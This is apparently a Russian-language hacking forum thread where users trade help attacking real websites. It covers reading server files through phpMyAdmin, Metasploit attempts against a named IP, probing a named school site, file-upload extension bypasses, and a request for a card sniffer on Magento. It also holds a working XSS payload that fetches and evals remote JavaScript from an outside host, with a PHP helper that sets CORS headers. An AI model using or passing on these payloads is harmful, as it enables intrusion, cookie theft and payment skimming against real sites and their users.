Товарищи, есть такой вопрос. Есть доступ к PMA, file_priv есть, но на мускуле стоит --secure-file-priv, а это значит, что я могу проводить операции с файлами только в рамках дефлтовой мускульной директории. Файлы сервака(psswd, конфиг апача) мне удалось почитать через LOAD DATA LOCAL INFILE, загружая их содержимое в мной созданную таблицу. В итоге у меня есть раскрытые пути, но есть ли вариант залиться куда-нибудь, кроме директории, указанной в --secure-file-priv ? или это без шансов и надо искать другой вектор? Спасибо.
Metasploit показывает 3 уязвимости + модули к этим уязвимостям, но получить сессию не получается почему ?
ХОЗЯИН ТИП ОТКРЫТ ОПИСАНИЕ МОДУЛЬ АТАКИ 107.154.249.133 - 107.154.249.133.ip.incapdns.net Уязвим к exploit/multi/misc/java_rmi_server Но не подключится, это как пример на другом сервере 3 уязвимости
Сама страница получяет такои ответ от сервера Code: 0.72611600+15169956671.php.jpg А в итоге картинка на странице выводется так Code: 000/013/927/000013927615.jpg Вопрос как все генерируется куда копать?
Нашел " /.svn/entries" в этом файле могут быть захешированные пароли? Нашел только логины и странные обозначения и калаоги: Code: 2015-11-19T15:19:41.000000Z 345d3c642a73d0f3d463fb1aba2b3e74 2015-11-19T14:39:32.670226Z launcher dir auth dir
Парни подскажите что можно сделать??! http://school2.perm.ru/administrator и таких дырок в каждой директории.Попробовал заюзать RFI LFI -безуспешно. P.S. Есть мысли ???может кто поможет в этом направлении?
Там нет ни LFI, ни RFI. Я объясню почему так. В движке этого сайта не предусмотрен mod_rewrite, посему обращение в файлам происходит напрямую с помощью include(); "administrator" - это не файл, посему идёт обращение как в папке. Движок нам говорит, что он обращается к дефолтному index.php (то есть получается движок инклудит так: $_GET["path"]."/index.php"), а его там нет и происходит эта ошибка. Если вместо administrator ввести любое другое значение - реакция будет такая же. Данное можно трактовать как обычное раскрытие полного пути.
Вряд ли там будут какие-то данные в открытом виде. Это ж система контроля версий (как и гит). Можно попытаться получить все файлы с исходными кодами, вот посоветую этот скрипт.
Можно. Только за тебя это делать никто не будет. Это ветка вопросов по уязвимостям, а не по просьбам о взломе. Найди уязвимость, а растолковать и прояснить моменты-мы всегда за.
Посоветуите нормальныи большои список bypass extension для картинок Code: image.php.jpg image.jpg.php image.php;.jpg image.php%00.jpg image.php\0.jpg
спасибо! помогло! А есть ли подобная вещь для WYSIWYG? заточенная на поиск загрузку файлов и тд dirb использую, dirbuster тоже но интересует более узкоспециализированное
Magento Version 1.8.1.0 Кто нить устанавливал снифер на эту версию? нужна помощь, в каком файле данные обрабатываются?
Есть такои XSS вектор Code: <img name="alert(document.cookie)" onerror="eval(name)" src="" /> Хочу сделать скриншот странице админа, нашел все необходимое, но скрипта очень много и засунуть в name="" получится но и за непонятнои фильтрации он никак не заработает, вариант такои засунуть в name="" что то типа инклуда и заинклудить весь .js, какие варианты инклуда есть типо Code: <img name="include(https:/host/script.js)" onerror="eval(name)" src="" /> ЕСТЬ В JS ИНКЛУД ЧЕРЕЗ JS?
HTML: <img name="xhr=new XMLHttpRequest();xhr.open('GET','https:/host/script.php',false);xhr.send();xhr.responseText" onerror="eval(eval(name))" src="" /> нужно учитывать, что для кроссдоменных запросов от сервера должен приходить заголовок Access-Control-Allow-Origin, поэтому мы делаем запрос не прямиком к js файлу а к php, который отправляет нужный нам заголовок и содержимое js пейлоада содержимое самого php: PHP: <?phpheader("Access-Control-Allow-Origin: *");echo file_get_contents("payload.js");?>
Не хочет Code: <p><img name="xhr=new XMLHttpRequest();xhr.open('GET','http://host/images/s/s.php',false);xhr.send();xhr.responseText" onerror="eval(name)" /></p> s.php Code: <?php header("Access-Control-Allow-Origin: *"); echo file_get_contents("alert.js"); ?> http://host/images/s/s.php Code: alert("1");